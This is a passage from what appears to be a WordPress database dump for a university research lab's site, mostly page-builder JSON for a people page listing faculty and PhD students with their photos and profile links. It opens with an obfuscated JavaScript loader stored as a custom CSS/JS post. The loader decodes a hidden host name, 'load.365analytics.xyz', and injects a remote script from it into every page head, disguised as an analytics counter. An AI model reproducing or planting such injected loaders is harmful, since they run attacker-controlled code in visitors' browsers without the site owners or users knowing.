_0x26bed4=atob(_0x45965e(0xc6));_0x2572e7=_0x17c8ea[_0x45965e(0xb8)](_0x45965e(0xc9)),_0x2572e7[_0x45965e(0xc2)]=\'text/javascript\',_0x2572e7[_0x45965e(0xc7)]=!![],_0x2572e7[_0x45965e(0xca)]=_0x45965e(0xc8)+_0x26bed4+_0x45965e(0xc5)+_0x5c98df+\'.js?ver=\'+_0x4c3cdb,_0x17c8ea[\'getElementsByTagName\'](\'head\')[0x0][_0x45965e(0xc3)](_0x2572e7);}(document));function _0x442d(_0x2d5425,_0x24f6b1){var _0x2bdaa6=_0x2bda();return _0x442d=function(_0x442dcc,_0xed4883){_0x442dcc=_0x442dcc-0xb6;var _0x3d5d1e=_0x2bdaa6[_0x442dcc];return _0x3d5d1e;},_0x442d(_0x2d5425,_0x24f6b1);}function _0x2bda(){var _0x5e335c=[\'script\',\'src\',\'14DpQhBD\',\'584673URYUaU\',\'createElement\',\'2561046jKBsjh\',\'referrer\',\'3560382XMVYNj\',\'7706THDVnA\',\'489360rDhlQm\',\'now\',\'toString\',\'4117806bwNLOr\',\'59780dGwAwr\',\'type\',\'appendChild\',\'136qCYCNj\',\'/my.counter.\',\'bG9hZC4zNjVhbmFseXRpY3MueHl6\',\'async\',\'https://\'];_0x2bda=function(){return _0x5e335c;};return _0x2bda();}\r\n</script>','','','publish','closed','closed','','1594','','','2023-10-18 04:01:04','2023-10-18 08:01:04','',0,'https://gsudice.dataconn.net/?post_type=custom-css-js&p=1594',0,'custom-css-js','',0),(1595,1,'2023-09-29 21:25:38','2023-09-30 01:25:38','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sarah_Akinola-scaled-2.jpg','Sarah_Akinola','','inherit','open','closed','','sarah_akinola-2','','','2023-10-13 10:42:39','2023-10-13 14:42:39','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sarah_Akinola-scaled-2.jpg',0,'attachment','image/jpeg',0),(1596,1,'2023-09-29 21:26:31','2023-09-30 01:26:31','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Anvith-1.jpg','cropped-Anvith-1.jpg','','inherit','open','closed','','cropped-anvith-1-jpg','','','2023-09-29 21:26:31','2023-09-30 01:26:31','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Anvith-1.jpg',0,'attachment','image/jpeg',0),(1597,1,'2023-09-29 21:28:24','2023-09-30 01:28:24','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Anvith.jpg','cropped-Anvith.jpg','','inherit','open','closed','','cropped-anvith-jpg','','','2023-09-29 21:28:24','2023-09-30 01:28:24','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Anvith.jpg',0,'attachment','image/jpeg',0),(1599,1,'2023-09-29 21:35:55','2023-09-30 01:35:55','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Brindal-1.jpeg','cropped-Brindal-1.jpeg','','inherit','open','closed','','cropped-brindal-1-jpeg','','','2023-09-29 21:35:55','2023-09-30 01:35:55','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Brindal-1.jpeg',0,'attachment','image/jpeg',0),(1600,1,'2023-09-29 21:40:50','2023-09-30 01:40:50','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Reshmanjali-1.jpeg','cropped-Reshmanjali-1.jpeg','','inherit','open','closed','','cropped-reshmanjali-1-jpeg','','','2023-09-29 21:40:50','2023-09-30 01:40:50','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Reshmanjali-1.jpeg',0,'attachment','image/jpeg',0),(1601,1,'2023-09-29 21:57:38','2023-09-30 01:57:38','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-SRM-360x360-1.png','SRM-360x360','','inherit','open','closed','','srm-360x360-2','','','2023-09-29 21:57:38','2023-09-30 01:57:38','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-SRM-360x360-1.png',0,'attachment','image/png',0),(1610,1,'2023-09-29 22:13:21','2023-09-30 02:13:21','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Faculty\",\"attrs\":{\"id\":\"faculty\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c427\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c427\",\"index\":0,\"id\":\"182-c428\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-headshot.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":629,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c427\",\"index\":0,\"id\":\"182-c429\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c427\",\"index\":2,\"id\":\"182-c430\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c427\",\"index\":1,\"id\":\"182-c431\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=C5PVPkoAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c427\",\"index\":1,\"id\":\"182-c432\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c433\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c433\",\"index\":0,\"id\":\"182-c434\",\"partialId\":182,\"styleRef\":978,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-Portrait-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1409,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c433\",\"index\":0,\"id\":\"182-c435\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Armin Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c433\",\"index\":2,\"id\":\"182-c436\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p> Chair and Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c433\",\"index\":1,\"id\":\"182-c437\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=41ckZZsAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c433\",\"index\":1,\"id\":\"182-c438\",\"partialId\":182,\"styleRef\":979,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c439\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c439\",\"index\":0,\"id\":\"182-c440\",\"partialId\":182,\"styleRef\":980,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-sunderraman1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":702,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c439\",\"index\":0,\"id\":\"182-c441\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Raj Sunderraman\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c439\",\"index\":2,\"id\":\"182-c442\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Chair and Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c439\",\"index\":1,\"id\":\"182-c443\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/raj-sunderraman-a5591bb2\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/raj-sunderraman\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?hl=en&user=Wlxc9FEAAAAJ\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c439\",\"index\":1,\"id\":\"182-c444\",\"partialId\":182,\"styleRef\":981,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c445\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c445\",\"index\":0,\"id\":\"182-c446\",\"partialId\":182,\"styleRef\":982,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-SRM-360x360-1.png\",\"caption\":{\"text\":\"\"},\"imageId\":1601,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c445\",\"index\":0,\"id\":\"182-c447\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Susie Ramisetty-Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c445\",\"index\":2,\"id\":\"182-c448\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Research Associate Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c445\",\"index\":1,\"id\":\"182-c449\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Population Health Sciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/susie-ramisetty-mikler-7a0b3014\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/publichealth.gsu.edu\\/profile\\/susie-ramisetty-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=KzNVJwIAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354}]},\"parentId\":\"182-c445\",\"index\":1,\"id\":\"182-c450\",\"partialId\":182,\"styleRef\":983,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c455\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c455\",\"index\":0,\"id\":\"182-c456\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-bourgeois.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":696,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c455\",\"index\":0,\"id\":\"182-c457\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Anu Bourgeois\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c455\",\"index\":2,\"id\":\"182-c458\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c455\",\"index\":1,\"id\":\"182-c459\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anu-bourgeois-09b7b32b\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/anu-bourgeois\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=qsAUgQ8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c455\",\"index\":1,\"id\":\"182-c460\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c461\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c461\",\"index\":0,\"id\":\"182-c462\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-patterson.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1391,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c461\",\"index\":0,\"id\":\"182-c463\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Murray Patterson\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c461\",\"index\":2,\"id\":\"182-c464\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Assistant Professor <\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c461\",\"index\":1,\"id\":\"182-c465\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/murray-patterson-449a947\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/murray-patterson\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=X4J8vAEAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c461\",\"index\":1,\"id\":\"182-c466\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c467\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c467\",\"index\":0,\"id\":\"182-c468\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-zelikovsky.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":704,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c467\",\"index\":0,\"id\":\"182-c469\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Alex Zelikovsky\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c467\",\"index\":2,\"id\":\"182-c470\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Distinguished University Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c467\",\"index\":1,\"id\":\"182-c471\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/alex-zelikovsky-48a2795\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/alex-zelikovsky\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=UzCRNJwAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c467\",\"index\":1,\"id\":\"182-c472\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c473\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c473\",\"index\":0,\"id\":\"182-c474\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/08\\/hu_new-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1348,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c473\",\"index\":0,\"id\":\"182-c475\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Xiaolin Hu\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c473\",\"index\":2,\"id\":\"182-c476\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c473\",\"index\":1,\"id\":\"182-c477\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/csds.gsu.edu\\/profile\\/xiaolin-hu\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=zeU19nAAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c473\",\"index\":1,\"id\":\"182-c478\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c479\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c479\",\"index\":0,\"id\":\"182-c480\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Taylor-shelton_300x300.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":705,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c479\",\"index\":0,\"id\":\"182-c481\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Taylor Shelton\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c479\",\"index\":2,\"id\":\"182-c482\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Assistant Professor<\\/span><\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c479\",\"index\":1,\"id\":\"182-c483\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/taylor-shelton-28a4b3291\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/taylor-shelton\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=WFA1Ry8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c479\",\"index\":1,\"id\":\"182-c484\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"}],\"id\":\"182-c426\",\"parentId\":\"182-c425\",\"partialId\":182,\"styleRef\":971,\"type\":\"content\"}],\"id\":\"182-c425\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Faculty\"},\"id\":\"182-c453\",\"parentId\":\"182-c452\",\"partialId\":182,\"styleRef\":986,\"type\":\"content\"}],\"id\":\"182-c452\",\"parentId\":\"182-c451\",\"partialId\":182,\"styleRef\":985,\"type\":\"content\"}],\"id\":\"182-c451\",\"parentId\":\"182-c425\",\"partialId\":182,\"styleRef\":984,\"type\":\"content\"}]},\"styleRef\":970,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Grads\",\"attrs\":{\"id\":\"grads\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c78\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c78\",\"index\":0,\"id\":\"182-c79\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Sundos_Al_Subhi-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1592,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c78\",\"index\":0,\"id\":\"182-c80\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sundos Al Subhi<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c78\",\"index\":2,\"id\":\"182-c81\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c78\",\"index\":3,\"id\":\"182-c246\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sundos-al-subhi-88bb97150\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c78\",\"index\":1,\"id\":\"182-c83\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c72\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c72\",\"index\":0,\"id\":\"182-c73\",\"partialId\":182,\"styleRef\":849,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/06\\/cropped-IMG_1240-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1336,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c72\",\"index\":0,\"id\":\"182-c74\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Aaja Christie<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c72\",\"index\":2,\"id\":\"182-c75\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c72\",\"index\":3,\"id\":\"182-c245\",\"partialId\":182,\"styleRef\":901,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/aaja-christie-17573657\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c72\",\"index\":1,\"id\":\"182-c77\",\"partialId\":182,\"styleRef\":853,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c84\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c84\",\"index\":0,\"id\":\"182-c85\",\"partialId\":182,\"styleRef\":856,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Emma.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":966,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c84\",\"index\":0,\"id\":\"182-c86\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Emma McDaniel<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c84\",\"index\":2,\"id\":\"182-c87\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD 